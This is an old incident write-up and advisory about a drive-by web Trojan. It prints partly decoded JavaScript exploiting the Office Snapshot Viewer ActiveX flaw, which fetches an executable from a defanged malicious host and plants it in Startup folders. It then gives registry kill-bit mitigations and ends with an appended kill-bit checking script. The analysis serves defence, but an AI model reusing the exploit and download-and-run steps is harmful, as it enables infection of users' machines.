No patch? How to block the latest Office vulnerability - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200819835
Type myhack58
Reporter Anonymous
Modified 2008-07-27T00:00:00


A friend of mine is doing a network administration internship at a 3D training company. He had to go home for a few days and asked me to cover his job in the meantime. The company is medium-sized: a LAN behind a router with roughly 200 PCs on a 10M fibre link, yet the connection was surprisingly slow. Every computer has antivirus software plus an ARP firewall, and the ARP firewall kept popping up warnings that 192.168.1.102 was attacking. Clearly that machine had been compromised, and its attacks on the LAN were what made the Internet so slow. None of the machines hold anything important; they mainly run some 3D software. I located the computer by its IP and borrowed it as my own for the time being.

Opening IE showed that the home page had been tampered with and now pointed at an unknown page; the antivirus and firewall would not start, and some programs reported errors on launch (probably already infected). It looked like a lot of malware, and cleaning it by hand would have taken some time. Here a poisoned machine is normally just re-imaged with GHOST, and to save time this one would be too, since it held no important data. But before reimaging I wanted to work out how it got infected. People here rarely download software, so infection through a trojan bundled with a download was unlikely; most probably it came from browsing some web page.

First I disconnected the local network connection. One of the pop-up web pages contained the following code: Figure 1

Figure 1

One look and it was clearly a web Trojan. I downloaded the page from another machine with Thunder and got a pile of code:

Figure 2

It is a web Trojan encrypted with a custom function. At the end of the encrypted code there is an eval call; change that eval into document.write, save, and open the page directly to obtain the first level of decryption, as follows: Figure 3

Figure 3

Copy the decrypted code above into a second page, replace document.write(t) with document.getElementById('textfield').value=t;, and add the following form to the page (an id="textfield" is added to the textarea so that getElementById finds it in browsers that do not match on the name attribute):

<form id="form1" name="form1" method="post" action="">
<label>
<textarea id="textfield" name="textfield" cols="100" rows="50"></textarea>
</label>
</form>

Note that the textfield in document.getElementById('textfield').value=t; must match the textfield of the textarea. After opening this page you obtain the final decryption result. Figure 4

The complete code is posted below:

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx="[object]")
{
setTimeout('window.location = "ldap://"',3000
// lines 22-25 of the original listing are missing from the page; the code that assigns x and obj is absent here

var buf1 = 'hxxp://';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>

In the listing http has been replaced with hxxp to prevent accidental clicks.

Obviously this is exploit code for the Microsoft Office Snapshot Viewer ActiveX vulnerability, a vulnerability in Access from the Office suite. It affects Microsoft Access 2003, 2002 and 2000, and a machine with only the Microsoft Snapshot Viewer 10.0.4622 program installed is vulnerable too. No wonder this hole catches even fully patched systems: there is still no official patch, and in truth no system in the world has every patch applied anyway. Notice this part of the code:

mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";

This shows the approach the exploit author likes. The three wab.exe paths on c:, d: and e: are the way the vulnerability is used to run the malicious program directly; the last two lines write it into the Startup folder (the localized and the English Start Menu paths) under the name Thunder.exe, so that even if the vulnerability does not trigger it directly, the malicious program runs quietly at the next boot. The address hxxp://jijiks8ahsda.cn/9/ck.exe in the code is where the malicious program is downloaded from. This exploit code is already spreading online, and the vulnerability-update feature bundled with antivirus software does not cover it because there is no official patch for this hole.

After GHOSTing the system, which came with Office 2003, I replaced hxxp://jijiks8ahsda.cn/9/ck.exe with a small VB program of my own and tested the vulnerability locally: after opening the page the program's window popped up, and the VB applet appeared in the startup items. For users without security protection the chance of being trojaned through this vulnerability is very high, so finally I hardened the LAN.

First, on all machines set the Internet zone security level in IE to "High", then add the malicious site to the Restricted sites zone. Next, disable the COM component so the vulnerability cannot be triggered; this is only a temporary measure. Copy the following into Notepad:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

Save it as safe.reg and run it on every machine on the LAN to import it into the registry; this disables the COM component by hand. Finally, turn on the web Trojan interception feature of the antivirus on all machines, and apply the official patch as soon as it is released.
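Before pushing safe.reg to a couple of hundred machines it is worth checking that the file really sets the kill bit. The following is an added example, not from the article: it parses a .reg file of this shape and reports any of the three Snapshot Viewer CLSIDs above whose "Compatibility Flags" value lacks the 0x400 kill bit; the sample file is constructed with one entry deliberately wrong.

```javascript
// Added example: verify that a .reg file kill-bits the expected controls.
// IE honours bit 0x400 of "Compatibility Flags" under the ActiveX
// Compatibility\{CLSID} key as the kill bit.
const KILL_BIT = 0x400;

// The three CLSIDs from the article's safe.reg (Snapshot Viewer control).
const EXPECTED_CLSIDS = [
  "{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}",
  "{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}",
  "{F2175210-368C-11D0-AD81-00A0C90DC8D9}",
];

const KEY_RE = /^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\(\{[0-9A-Fa-f-]+\})\]$/i;
const VAL_RE = /^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$/i;

// Map CLSID -> Compatibility Flags value for every ActiveX Compatibility key.
function parseKillBits(regText) {
  const result = new Map();
  let currentClsid = null;
  for (const raw of regText.split(/\r?\n/)) {
    const line = raw.trim();
    if (line.startsWith("[")) {            // any [key] line starts a new key
      const key = line.match(KEY_RE);
      currentClsid = key ? key[1].toUpperCase() : null;
      continue;
    }
    const val = line.match(VAL_RE);
    if (val && currentClsid) result.set(currentClsid, parseInt(val[1], 16));
  }
  return result;
}

// Expected CLSIDs that are missing from the file or lack the kill bit.
function missingKillBits(regText, expected = EXPECTED_CLSIDS) {
  const flags = parseKillBits(regText);
  return expected.filter((c) => !((flags.get(c.toUpperCase()) || 0) & KILL_BIT));
}

// Constructed sample: the third entry deliberately has the wrong flag value.
const SAMPLE_REG = `Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000000
`;
```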